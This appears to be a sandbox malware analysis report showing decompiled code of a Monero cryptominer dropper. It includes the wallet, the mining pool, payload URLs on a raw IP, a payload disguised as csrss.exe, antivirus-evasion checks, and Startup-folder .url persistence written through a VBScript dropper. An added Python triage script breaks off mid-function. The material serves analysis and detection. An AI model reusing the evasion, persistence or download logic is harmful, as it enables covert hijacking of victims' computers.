                                                                                                                                          														if( *0x5d2110 != 0) {
                                                                                                                                          															goto L80;
                                                                                                                                          														}
                                                                                                                                          														if(_t168 != 0) {
                                                                                                                                          															E00408730(_t150);
                                                                                                                                          															_t187 = _t187 + 4;
                                                                                                                                          															_t168 = 0;
                                                                                                                                          														}
                                                                                                                                          														if( *0x5d1308 != 0) {
                                                                                                                                          															_t114 = E00403050(_t150, _t152,  &_v2136, 0);
                                                                                                                                          															_t187 = _t187 + 8;
                                                                                                                                          															_t150 = _t114;
                                                                                                                                          															_t168 = 1;
                                                                                                                                          														}
                                                                                                                                          														_v8 = 0;
                                                                                                                                          														goto L68;
                                                                                                                                          													}
                                                                                                                                          												}
                                                                                                                                          											}
                                                                                                                                          											ExitProcess(0x1c);
                                                                                                                                          										} else {
                                                                                                                                          											_t120 =  *0x5d2074; // 0x3832
                                                                                                                                          											asm("movq xmm0, [0x5d206c]");
                                                                                                                                          											_v40 = _t120;
                                                                                                                                          											asm("movq [ebp-0x2c], xmm0");
                                                                                                                                          											_v38 = _t150;
                                                                                                                                          											E00401A00( &_v592, "C:\ProgramData\LKBNMTFJgl");
                                                                                                                                          											_t125 = E00401600( &_v72,  &_v48);
                                                                                                                                          											_t183 = _t182 + 0x10;
                                                                                                                                          											if(_t125 == 0) {
                                                                                                                                          												ExitProcess(0x2f);
                                                                                                                                          											}
                                                                                                                                          											E00401970( &_v592, "\\");
                                                                                                                                          											E00401970( &_v592,  &_v72);
                                                                                                                                          											E00401970( &_v592, "_");
                                                                                                                                          											E00401970( &_v592, L"3.1.0");
                                                                                                                                          											_t188 = _t183 + 0x20;
                                                                                                                                          											_t137 =  *0x5d10b8( &_v592,  &_v20, 0, 0);
                                                                                                                                          											_t207 = _t137 - 1;
                                                                                                                                          											if(_t137 == 1) {
                                                                                                                                          												_t139 = E004037E0(_t207,  &_v592); // executed
                                                                                                                                          												_t189 = _t188 + 4;
                                                                                                                                          												_t208 = _t139;
                                                                                                                                          												if(_t139 != 0) {
                                                                                                                                          													E004039B0(_t153);
                                                                                                                                          													_push(_v16);
                                                                                                                                          													E00403680(_t153, _v20);
                                                                                                                                          													_t189 = _t189 + 8;
                                                                                                                                          												}
                                                                                                                                          												_t140 = E00404DE0(_t152, _t153, _t208, "http://45.144.225.135/config.txt", "FALSE", "xmr-us-east1.nanopool.org:14444", 0, 0); // executed
                                                                                                                                          												_t182 = _t189 + 0x14;
                                                                                                                                          												if(_t140 != 0) {
                                                                                                                                          													E004039B0(_t153);
                                                                                                                                          													E00403B50(_t153, _v20, _v16); // executed
                                                                                                                                          													_t182 = _t182 + 8;
                                                                                                                                          												}
                                                                                                                                          												goto L33;
                                                                                                                                          											}
                                                                                                                                          											ExitProcess(0x3c);
                                                                                                                                          										}
                                                                                                                                          									} else {
                                                                                                                                          										ExitProcess(0x32);
                                                                                                                                          									}
                                                                                                                                          								}
                                                                                                                                          								ExitProcess(0x31);
                                                                                                                                          							}
                                                                                                                                          							ExitProcess(0x30);
                                                                                                                                          						}
                                                                                                                                          						ExitProcess(0x30);
                                                                                                                                          					} else {
                                                                                                                                          						ExitProcess(0x30);
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          				ExitProcess(0x3b);
                                                                                                                                          			}
                                                                                                                                          0x00404506
                                                                                                                                          0x0040450e
                                                                                                                                          0x00404512
                                                                                                                                          0x00404512
                                                                                                                                          0x00404518
                                                                                                                                          0x0040451e
                                                                                                                                          0x00404520
                                                                                                                                          0x00404525
                                                                                                                                          0x00404529
                                                                                                                                          0x00404529
                                                                                                                                          0x0040452f
                                                                                                                                          0x00404545
                                                                                                                                          0x00404549
                                                                                                                                          0x00404559
                                                                                                                                          0x0040455e
                                                                                                                                          0x00404563
                                                                                                                                          0x00404565
                                                                                                                                          0x00404565
                                                                                                                                          0x0040456c
                                                                                                                                          0x00404578
                                                                                                                                          0x0040457d
                                                                                                                                          0x00404580
                                                                                                                                          0x00404582
                                                                                                                                          0x00404591
                                                                                                                                          0x00404596
                                                                                                                                          0x00404599
                                                                                                                                          0x0040459f
                                                                                                                                          0x004045ab
                                                                                                                                          0x004045b0
                                                                                                                                          0x004045b0
                                                                                                                                          0x004045bd
                                                                                                                                          0x004045c2
                                                                                                                                          0x004045c7
                                                                                                                                          0x004045db
                                                                                                                                          0x004045e0
                                                                                                                                          0x004045e5
                                                                                                                                          0x004045f9
                                                                                                                                          0x004045fe
                                                                                                                                          0x00404603
                                                                                                                                          0x00404619
                                                                                                                                          0x0040461e
                                                                                                                                          0x00404623
                                                                                                                                          0x00404637
                                                                                                                                          0x00404646
                                                                                                                                          0x0040464b
                                                                                                                                          0x00404655
                                                                                                                                          0x0040465d
                                                                                                                                          0x00404677
                                                                                                                                          0x00404691
                                                                                                                                          0x00404697
                                                                                                                                          0x00404697
                                                                                                                                          0x004046a6
                                                                                                                                          0x004046ab
                                                                                                                                          0x004046b0
                                                                                                                                          0x004047b8
                                                                                                                                          0x004047bf
                                                                                                                                          0x004047c4
                                                                                                                                          0x004047c9
                                                                                                                                          0x004047f2
                                                                                                                                          0x004047ff
                                                                                                                                          0x0040481c
                                                                                                                                          0x00404821
                                                                                                                                          0x00404826
                                                                                                                                          0x00404af0
                                                                                                                                          0x00404af2
                                                                                                                                          0x00404af2
                                                                                                                                          0x00404843
                                                                                                                                          0x00404848
                                                                                                                                          0x0040484d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00404853
                                                                                                                                          0x0040485f
                                                                                                                                          0x00404861
                                                                                                                                          0x00404866
                                                                                                                                          0x00404868
                                                                                                                                          0x00404871
                                                                                                                                          0x00404876
                                                                                                                                          0x00404878
                                                                                                                                          0x0040487f
                                                                                                                                          0x00404882
                                                                                                                                          0x00404882
                                                                                                                                          0x00404876
                                                                                                                                          0x00404866
                                                                                                                                          0x0040488c
                                                                                                                                          0x00404897
                                                                                                                                          0x0040489d
                                                                                                                                          0x0040489d
                                                                                                                                          0x0040488e
                                                                                                                                          0x00404893
                                                                                                                                          0x00404893
                                                                                                                                          0x0040489f
                                                                                                                                          0x004048a6
                                                                                                                                          0x004048b1
                                                                                                                                          0x004048bb
                                                                                                                                          0x004048cf
                                                                                                                                          0x004048bd
                                                                                                                                          0x004048c2
                                                                                                                                          0x004048c7
                                                                                                                                          0x004048ca
                                                                                                                                          0x004048ca
                                                                                                                                          0x004048d4
                                                                                                                                          0x004048dc
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x004048de
                                                                                                                                          0x004048e4
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x004048e6
                                                                                                                                          0x004048ec
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x004048ee
                                                                                                                                          0x004048f4
                                                                                                                                          0x00404916
                                                                                                                                          0x0040491d
                                                                                                                                          0x00404928
                                                                                                                                          0x0040492d
                                                                                                                                          0x00404930
                                                                                                                                          0x00404932
                                                                                                                                          0x00404932
                                                                                                                                          0x00404937
                                                                                                                                          0x00000000
                                                                                                                                          0x00404937
                                                                                                                                          0x004048fe
                                                                                                                                          0x00404903
                                                                                                                                          0x00404906
                                                                                                                                          0x0040490d
                                                                                                                                          0x0040490f
                                                                                                                                          0x00000000
                                                                                                                                          0x00404940
                                                                                                                                          0x00404940
                                                                                                                                          0x00404940
                                                                                                                                          0x00404944
                                                                                                                                          0x004049ab
                                                                                                                                          0x004049ab
                                                                                                                                          0x004049b1
                                                                                                                                          0x004049f9
                                                                                                                                          0x004049f9
                                                                                                                                          0x004049fd
                                                                                                                                          0x00404a03
                                                                                                                                          0x00404a0a
                                                                                                                                          0x00404a10
                                                                                                                                          0x00404a17
                                                                                                                                          0x00404a28
                                                                                                                                          0x00404a32
                                                                                                                                          0x00404a37
                                                                                                                                          0x00404a3c
                                                                                                                                          0x00404a48
                                                                                                                                          0x00404a4a
                                                                                                                                          0x00404a57
                                                                                                                                          0x00404a59
                                                                                                                                          0x00404a72
                                                                                                                                          0x00404a75
                                                                                                                                          0x00404a7a
                                                                                                                                          0x00404a7f
                                                                                                                                          0x00404a88
                                                                                                                                          0x00404a8c
                                                                                                                                          0x00404a8f
                                                                                                                                          0x00404a94
                                                                                                                                          0x00404a94
                                                                                                                                          0x00404aae
                                                                                                                                          0x00404aca
                                                                                                                                          0x00404acf
                                                                                                                                          0x00404acf
                                                                                                                                          0x00404ad8
                                                                                                                                          0x00404add
                                                                                                                                          0x00404add
                                                                                                                                          0x00404a7f
                                                                                                                                          0x00404a59
                                                                                                                                          0x00404ae5
                                                                                                                                          0x00000000
                                                                                                                                          0x00404ae5
                                                                                                                                          0x00404a19
                                                                                                                                          0x00404a1b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00404a1d
                                                                                                                                          0x00404a1e
                                                                                                                                          0x00404a23
                                                                                                                                          0x00404a26
                                                                                                                                          0x00000000
                                                                                                                                          0x00404a26
                                                                                                                                          0x00404a0c
                                                                                                                                          0x00404a0e

APIs
• GetTickCount.KERNEL32 ref: 00404487
• SetErrorMode.KERNELBASE(00000002), ref: 004044E5
• SetErrorMode.KERNELBASE(00000000), ref: 004044EB
• CreateMutexA.KERNELBASE(00000000,00000000,e9c1286a28d82a2d0ee6), ref: 00404506
• ExitProcess.KERNEL32 ref: 00404512
• GetLastError.KERNEL32 ref: 0040451E
• ExitProcess.KERNEL32 ref: 00404529
Strings
Memory Dump Source
• Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Error$ExitModeProcess$CountCreateLastMutexTick
• String ID: --show-window$3.1.0$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos$C:\ProgramData\LKBNMTFJgl$FALSE$FALSE$FALSE$LKBNMTFJgl$LKBNMTFJgl$csrss.exe$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$e9c1286a28d82a2d0ee6$e9c1286a28d82a2d0ee6$http://45.144.225.135/config.txt$taskmgr.exe$viTRMUuKeV$viTRMUuKeV$xmr-us-east1.nanopool.org:14444$xmr-us-east1.nanopool.org:14444
• API String ID: 3615071802-544947428
• Opcode ID: e7c3370e5e554634d6f38dec234f5c2f7b09adaa70533622726b45a566a1b702
• Instruction ID: deaf04295798d6261b51ffebf117c96f993ab97e4c983c13017be75728aacaa1
• Opcode Fuzzy Hash: e7c3370e5e554634d6f38dec234f5c2f7b09adaa70533622726b45a566a1b702
• Instruction Fuzzy Hash: E9F1F7F5E41704B7DB20ABB5AD06B9F36A86B50749F040437FA04B22D2E77C5A44CB6E
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
E00403220(void* __ecx, void* __esi, void* __eflags) {
	intOrPtr _t10;
	intOrPtr _t14;
	void* _t17;
	intOrPtr _t19;
	intOrPtr _t27;
	void* _t31;
	void* _t35;
	long _t37;
	short _t38;
	void* _t41;
	void* _t43;
	struct HINSTANCE__* _t44;
	struct HINSTANCE__* _t46;
	struct HINSTANCE__* _t48;
	struct HINSTANCE__* _t50;
	struct HINSTANCE__* _t52;
	struct HINSTANCE__* _t54;
	intOrPtr _t56;
	struct HINSTANCE__* _t58;
	struct HINSTANCE__* _t60;
	void* _t67;
	void* _t70;
	void* _t73;

	_t67 = __esi;
	_t43 = __ecx;
	 *0x5d1300 = 0;
	 *0x5d1304 = 0;
	 *0x5d1308 = 0;
	 *0x5d130c = 0;
	 *0x5d1310 = 0x7530;
	 *0x5d1238 = 0x5f;
	 *0x5d12bc = 0x18;
	 *0x5d19ac = 0x20;
	 *0x5d19b0 = 5;
	 *0x5d1318 = 0;
	 *0x5d131c = 0;
	 *0x5d1320 = 0;
	 *0x5d1bb8 = 1;
	 *0x5d1bbc = 0xa;
	 *0x5d1bc0 = 0;
	 *0x5d1c24 = 0;
	 *0x5d210c = 1;
	E00401BB0("[no-email]", 0, 0x80);
	E004017E0("[no-email]", "[no-email]");
	E004017E0("d06ed635-68f6-4e9a-955c-4899f5f57b9a", "GUID_ERROR");
	asm("xorps xmm0, xmm0");
	 *0x5d1c48 = 0;
	asm("movups [0x5d1c28], xmm0");
	asm("movups [0x5d1c38], xmm0");
	E00401BB0("C:\ProgramData\LKBNMTFJgl", 0, 0x208);
	E00401BB0("csrss.exe", 0, 0x60);
	asm("xorps xmm0, xmm0");
	asm("movups [0x5d158c], xmm0");
	asm("movups [0x5d159c], xmm0");
	E00401BB0("http://45.144.225.135/notepad.exe", 0, 0x200);
	E00401BB0(0x5d12c0, 0, 0x40);
	E00401640(0x5d12c0, 0x409df0, 0x40);
	E00401BB0("http://45.144.225.135/config.txt", 0, 0x200);
	_t10 =  *0x5d19ac; // 0x20
	E00401640("http://45.144.225.135/config.txt", 0x409e30, _t10 + 1);
	E00401BB0("FALSE", 0, 0x200);
	_t14 =  *0x5d19b0; // 0x5
	E00401640("FALSE", "FALSE", _t14 + 1);
	_t17 = E004017B0("FALSE", "http://45.144.225.135/config.txt");
	_t73 = _t70 + 0x90;
	if(_t17 != 0) {
		E00401CE0("0125789244697858", 0x10, "http://45.144.225.135/config.txt",  *0x5d19ac);
		_t41 = E004017B0("FALSE", "FALSE");
		_t73 = _t73 + 0x18;
		if(_t41 != 0) {
			E00401CE0("0125789244697858", 0x10, "FALSE",  *0x5d19b0);
			_t73 = _t73 + 0x10;
		}
	}
	_t19 = E00408270(_t43, GetCurrentProcess());
	 *0x5d1314 = _t19;
	if(_t19 != 0) {
		E00408DD0();
		_t60 =  *0x5d1318; // 0x0
		_t61 =  ==  ? 1 : _t60;
		 *0x5d1318 =  ==  ? 1 : _t60;
	}
	_push(_t67);
	E004017B0("TRUE", "TRUE");
                                                                                                                                          				_t44 =  *0x5d1300; // 0x1
                                                                                                                                          				_t45 =  ==  ? 1 : _t44;
                                                                                                                                          				 *0x5d1300 =  ==  ? 1 : _t44;
                                                                                                                                          				E004017B0("TASKMGR", "TASKMGR");
                                                                                                                                          				_t46 =  *0x5d1304; // 0x1
                                                                                                                                          				_t47 =  ==  ? 1 : _t46;
                                                                                                                                          				 *0x5d1304 =  ==  ? 1 : _t46;
                                                                                                                                          				E004017B0("1THREAD", "50%CPU");
                                                                                                                                          				_t48 =  *0x5d1308; // 0x2
                                                                                                                                          				_t49 =  ==  ? 1 : _t48;
                                                                                                                                          				 *0x5d1308 =  ==  ? 1 : _t48;
                                                                                                                                          				E004017B0("50%CPU", "50%CPU");
                                                                                                                                          				_t50 =  *0x5d1308; // 0x2
                                                                                                                                          				_t51 =  ==  ? 2 : _t50;
                                                                                                                                          				 *0x5d1308 =  ==  ? 2 : _t50;
                                                                                                                                          				E004017B0("100%CPU", "50%CPU");
                                                                                                                                          				_t52 =  *0x5d1308; // 0x2
                                                                                                                                          				_t53 =  ==  ? 3 : _t52;
                                                                                                                                          				 *0x5d1308 =  ==  ? 3 : _t52;
                                                                                                                                          				E004017B0("100%CPU", "100%CPU");
                                                                                                                                          				_t54 =  *0x5d130c; // 0x1
                                                                                                                                          				_t55 =  ==  ? 1 : _t54;
                                                                                                                                          				 *0x5d1bb4 = 0x1e;
                                                                                                                                          				 *0x5d130c =  ==  ? 1 : _t54;
                                                                                                                                          				E00401BB0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0, 0x100);
                                                                                                                                          				_t27 =  *0x5d1238; // 0x5f
                                                                                                                                          				E00401640("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos", 0x409f40, _t27 + 1);
                                                                                                                                          				E00401CE0("0125789244697858", 0x10, "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos",  *0x5d1238);
                                                                                                                                          				_t31 = E00401BE0("48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos",  *0x5d1238);
                                                                                                                                          				E00401BB0("xmr-us-east1.nanopool.org:14444", 0, 0x80);
                                                                                                                                          				_t56 =  *0x5d12bc; // 0x18
                                                                                                                                          				E00401640("xmr-us-east1.nanopool.org:14444", 0x40a018, _t56 + 1);
                                                                                                                                          				E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444",  *0x5d12bc);
                                                                                                                                          				_t35 = E00401BE0("xmr-us-east1.nanopool.org:14444",  *0x5d12bc);
                                                                                                                                          				if(_t31 != 0xd82f1fb8 || _t35 != 0x789308d0) {
                                                                                                                                          					ExitProcess(0x27);
                                                                                                                                          				}
                                                                                                                                          				E004018D0("xmr-us-east1.nanopool.org:14444", "nicehash.com");
                                                                                                                                          				_t58 =  *0x5d131c; // 0x0
                                                                                                                                          				_t59 =  !=  ? 1 : _t58;
                                                                                                                                          				 *0x5d131c =  !=  ? 1 : _t58;
                                                                                                                                          				_t37 = GetModuleFileNameW(0, "C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", 0x200);
                                                                                                                                          				if(_t37 == 0 || _t37 == 0x200) {
                                                                                                                                          					_t38 = 0;
                                                                                                                                          					 *0x5d1c4c = 0;
                                                                                                                                          					goto L12;
                                                                                                                                          				} else {
                                                                                                                                          					_t38 = E00408B20("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", "9dbcf183762872d8917b8a19535a0c65"); // executed
                                                                                                                                          					if(_t38 == 0) {
                                                                                                                                          						L12:
                                                                                                                                          						 *0x5d1c28 = 0;
                                                                                                                                          						 *0x5d2110 = 0;
                                                                                                                                          						return _t38;
                                                                                                                                          					} else {
                                                                                                                                          						 *0x5d1c48 = 0;
                                                                                                                                          						 *0x5d2110 = 0;
                                                                                                                                          						return _t38;
                                                                                                                                          					}
                                                                                                                                          				}
                                                                                                                                          			}


APIs
• GetCurrentProcess.KERNEL32(74B04D40), ref: 00403426
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe,00000200), ref: 0040361D
Strings
Memory Dump Source
• Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: CurrentFileModuleNameProcess
• String ID: 0125789244697858$0125789244697858$0125789244697858$0125789244697858$100%CPU$100%CPU$100%CPU$1THREAD$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW.WORKER/picktutos$50%CPU$50%CPU$50%CPU$50%CPU$9dbcf183762872d8917b8a19535a0c65$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe$FALSE$FALSE$FALSE$FALSE$GUID_ERROR$TASKMGR$TASKMGR$TRUE$TRUE$[no-email]$[no-email]$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$http://45.144.225.135/config.txt$http://45.144.225.135/notepad.exe$nicehash.com$viTRMUuKeV$xmr-us-east1.nanopool.org:14444
• API String ID: 2251294070-2739035969
• Opcode ID: 1c205f2d1241ad2fdd910ba5841d93698afb6b2d468f43393a3cd9dd5d578e36
• Instruction ID: 5c7772c3a6fcc4d75a1d869b2715d40eb421c31df5170a8a8dddbd709ea8cbad
• Opcode Fuzzy Hash: 1c205f2d1241ad2fdd910ba5841d93698afb6b2d468f43393a3cd9dd5d578e36
• Instruction Fuzzy Hash: DA919374781B007AE730AF66AC97F163BA0A760B45F14452FF500762E3D7F968489B8D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			// Persistence routine. It plants an Internet Shortcut (.url) in the Startup folder that
			// launches the payload staged under C:\ProgramData\LKBNMTFJgl, writing the shortcut either
			// directly or, when Emsisoft Anti-Malware processes are running, through a short VBScript.
			// E00401A00, E00401970 and E00401B40 behave as string assign, append and length helpers
			// (inferred from how they are used); the comments below are the editor's reading of the
			// decompiled code, not annotations from the sandbox.
			E004065D0(void* __eflags) {
				short _v524;   // "C:\ProgramData\LKBNMTFJgl\csrss.exe": payload named after the csrss.exe system process
				short _v1044;  // "C:\ProgramData\LKBNMTFJgl\r.vbs": dropper script used on the Emsisoft branch
				short _v1564;  // payload path with a second ".exe" appended
				char _v2588;   // VBScript body
				char _v3612;   // path of the .url shortcut inside the Startup folder
				char _v4636;   // [InternetShortcut] body
				void* _t61;
				void* _t69;
				void* _t71;
				void* _t73;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t128;
				void* _t134;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;
				void* _t150;

				E00401A00( &_v524, "C:\ProgramData\LKBNMTFJgl");
				E00401970( &_v524, "\\");
				E00401970( &_v524, "csrss.exe");
				// writes a terminating null into _v524 at an offset derived from its length (offset as recovered by the decompiler)
				 *((short*)(_t141 + E00401B40( &_v524) * 2 - 0x210)) = 0;
				E00401A00( &_v1044, "C:\ProgramData\LKBNMTFJgl");
				E00401970( &_v1044, L"\\r.vbs");
				// resolves a special folder into _v3612; the folder id 7 is the value of CSIDL_STARTUP,
				// which matches the report's "Drops script at startup location" signature
				_t61 = E00407FA0(0,  &_v3612, 0x40aad0, 7); // executed
				_t143 = _t142 + 0x38;
				if(_t61 != 0) {
					// shortcut name: <Startup>\viTRMUuKeV.url
					E00401970( &_v3612, "\\");
					E00401970( &_v3612, "viTRMUuKeV");
					E00401970( &_v3612, L".url");
					_t69 = E00406340( &_v524); // executed; a nonzero result on the payload path is required to continue
					_t144 = _t143 + 0x1c;
					__eflags = _t69;
					if(_t69 == 0) {
						goto L1;
					} else {
						// a2guard.exe, a2service.exe and a2start.exe are Emsisoft Anti-Malware processes
						// (cf. "AV process strings found"); if any is running, the direct write is avoided
						_t71 = E00407EF0("a2guard.exe"); // executed
						_t145 = _t144 + 4;
						__eflags = _t71;
						if(_t71 != 0) {
							L10:
							// Emsisoft present: only proceed directly if the .url already exists
							_t73 = E00407ED0( &_v3612);
							_t146 = _t145 + 4;
							__eflags = _t73;
							if(_t73 != 0) {
								goto L13;
							} else {
								// direct write of the shortcut body:
								// [InternetShortcut]\r\nURL="file:///<payload path>.exe"
								E00401A00( &_v4636, L"[InternetShortcut]\r\nURL=\"file:///");
								E00401970( &_v4636,  &_v524);
								E00401970( &_v4636, L".exe\"");
								_t100 = E00407AF0( &_v3612,  &_v4636); // writes _v4636 to the .url path
								_t146 = _t146 + 0x20;
								__eflags = _t100;
								if(_t100 != 0) {
									goto L13;
								} else {
									goto L12;
								}
							}
						} else {
							_t102 = E00407EF0("a2service.exe"); // executed
							_t145 = _t145 + 4;
							__eflags = _t102;
							if(_t102 != 0) {
								goto L10;
							} else {
								_t103 = E00407EF0("a2start.exe"); // executed
								_t145 = _t145 + 4;
								__eflags = _t103;
								if(_t103 != 0) {
									goto L10;
								} else {
									// no Emsisoft process found: skip the dropper if the .url is already in place
									_t105 = E00407ED0( &_v3612); // executed
									_t146 = _t145 + 4;
									__eflags = _t105;
									if(_t105 != 0) {
										L13:
										// shortcut is in place: rename csrss.exe to csrss.exe.exe (the name the
										// file:/// URL points at), post-process the renamed file, remove the original
										E00406990( &_v3612); // executed
										E00401A00( &_v1564,  &_v524);
										E00401970( &_v1564, L".exe");
										DeleteFileW( &_v1564); // executed
										MoveFileW( &_v524,  &_v1564); // executed
										E004068E0( &_v1564); // executed
										DeleteFileW( &_v524); // executed
										return 1;
									} else {
										// build r.vbs, which writes the same [InternetShortcut] body through
										// Scripting.FileSystemObject (cf. "WScript or CScript Dropper")
										E00401A00( &_v2588, L"Set objFSO=CreateObject(\"Scripting.FileSystemObject\")\r\n");
										E00401970( &_v2588, L"outFile=\"");
										E00401970( &_v2588,  &_v3612);
										E00401970( &_v2588, L"\"\r\n");
										E00401970( &_v2588, L"Set objFile = objFSO.CreateTextFile(outFile,True)\r\n");
										E00401970( &_v2588, L"objFile.Write \"[InternetShortcut]\" & vbCrLf & \"URL=\"\"file:///");
										E00401970( &_v2588,  &_v524);
										E00401970( &_v2588, L".exe\"\"\"\r\n");
										E00401970( &_v2588, L"objFile.Close\r\n");
										_t128 = E00407AF0( &_v1044,  &_v2588); // executed; writes the script to r.vbs
										_t150 = _t146 + 0x50;
										__eflags = _t128;
										if(__eflags == 0) {
											L12:
											__eflags = 0;
											return 0;
										} else {
											E00406A40(0, __eflags,  &_v1044); // executed; runs r.vbs
											Sleep(0xbb8); // 3000 ms for the script interpreter to write the .url
											DeleteFileW( &_v1044); // executed; removes the script
											_t134 = E00407ED0( &_v3612); // executed; did the .url appear?
											_t146 = _t150 + 8;
											__eflags = _t134;
											if(_t134 != 0) {
												goto L13;
											} else {
												return _t134;
											}
										}
									}
								}
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}
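The routine above leaves two artefacts a responder can hunt for: a .url file in the Startup folder whose URL= line is a file:/// reference to an executable in a user-writable directory, and (on the Emsisoft branch) a short VBScript that writes that file through Scripting.FileSystemObject. The following triage script is an added example written for this page, not code from the Joe Sandbox report or from the sample. It parses the [InternetShortcut] format, resolves file:/// URLs to Windows paths, scores the traits the decompiled code produces (executable target, ProgramData staging, doubled .exe extension, a core Windows process name outside System32) and recognises the dropper script. The sample inputs are constructed from the string literals in the decompiled routine; the Startup folder in the VBScript sample, the list of "suspicious" directories and the process-name list are assumptions chosen for triage rather than facts from the report.

```python
"""Triage Internet Shortcut (.url) persistence in Windows Startup folders.
Added example, not from the report or the sample; the directory and name lists are triage assumptions."""
import os
import re
from dataclasses import dataclass, field
from urllib.parse import unquote, urlparse

STARTUP_FOLDERS = (r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup",
                   r"%PROGRAMDATA%\Microsoft\Windows\Start Menu\Programs\StartUp")
SUSPICIOUS_DIRS = ("c:\\programdata\\", "c:\\users\\public\\", "\\appdata\\local\\temp\\")
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js", ".hta")
SYSTEM_PROCESS_NAMES = ("csrss", "svchost", "lsass", "wininit", "winlogon", "services", "smss")
VBS_DROPPER_MARKERS = ("scripting.filesystemobject", "createtextfile", "[internetshortcut]")

# Constructed inputs modelled on the literals in the decompiled routine (not captured files).
SAMPLE_URL_FILE = '[InternetShortcut]\r\nURL="file:///C:\\ProgramData\\LKBNMTFJgl\\csrss.exe.exe"\r\n'
SAMPLE_VBS = ('Set objFSO=CreateObject("Scripting.FileSystemObject")\r\n'
              'outFile="C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\viTRMUuKeV.url"\r\n'
              'Set objFile = objFSO.CreateTextFile(outFile,True)\r\n'
              'objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///C:\\ProgramData\\LKBNMTFJgl\\csrss.exe.exe"""\r\n'
              'objFile.Close\r\n')

@dataclass
class ShortcutFinding:
    url: str = None
    local_path: str = None
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self):
        return bool(self.reasons)

def parse_internet_shortcut(text):
    """Return the URL= value of the [InternetShortcut] section (surrounding quotes stripped), or None."""
    section = None
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "internetshortcut" and "=" in line:
            key, value = (s.strip() for s in line.split("=", 1))
            if key.lower() == "url":   # the sample wraps the value in double quotes
                return value[1:-1] if len(value) > 1 and value[0] == value[-1] == '"' else value
    return None

def file_url_to_path(url):
    """Map file:///C:\\x, file:///C:/x, file://C:/x and file://host/share/x to a Windows path; None if not file://."""
    p = urlparse(url)
    if p.scheme.lower() != "file":
        return None
    path = unquote(p.path)
    if re.fullmatch(r"[A-Za-z]:", p.netloc):   # file://C:/x puts the drive letter in netloc
        path = p.netloc + path
    elif p.netloc:                              # UNC share
        path = "\\\\" + p.netloc + path
    elif re.match(r"/[A-Za-z]:", path):         # file:///C:\x parses as /C:\x
        path = path[1:]
    return path.replace("/", "\\")

def assess_shortcut(text):
    """Inspect one .url body: http(s) targets are left alone, file:// targets are scored."""
    f = ShortcutFinding(parse_internet_shortcut(text))
    if f.url is None or (path := file_url_to_path(f.url)) is None:
        return f
    f.local_path, low = path, path.lower()
    if low.endswith(EXECUTABLE_SUFFIXES):
        f.reasons.append("file:// shortcut launches an executable at logon")
    if any(d in low for d in SUSPICIOUS_DIRS):
        f.reasons.append("target lives in a user-writable staging directory")
    if low.endswith(".exe.exe"):
        f.reasons.append("double .exe extension (renamed payload)")
    if low.rsplit("\\", 1)[-1].split(".")[0] in SYSTEM_PROCESS_NAMES and "\\windows\\system32\\" not in low:
        f.reasons.append("core Windows process name outside System32")
    return f

def dropper_vbs_target(text):
    """For VBScript that writes an [InternetShortcut] through Scripting.FileSystemObject, return the
    file:/// target it embeds (VBScript doubles quotes inside string literals); None otherwise."""
    if not all(m in text.lower() for m in VBS_DROPPER_MARKERS):
        return None
    m = re.search(r'file:///[^"\s]+', text)
    return m.group(0) if m else ""

def scan_startup_folders():
    """Walk both Startup folders; a .url written with wide-string APIs may be UTF-16, so sniff for NULs."""
    hits = []
    for folder in map(os.path.expandvars, STARTUP_FOLDERS):
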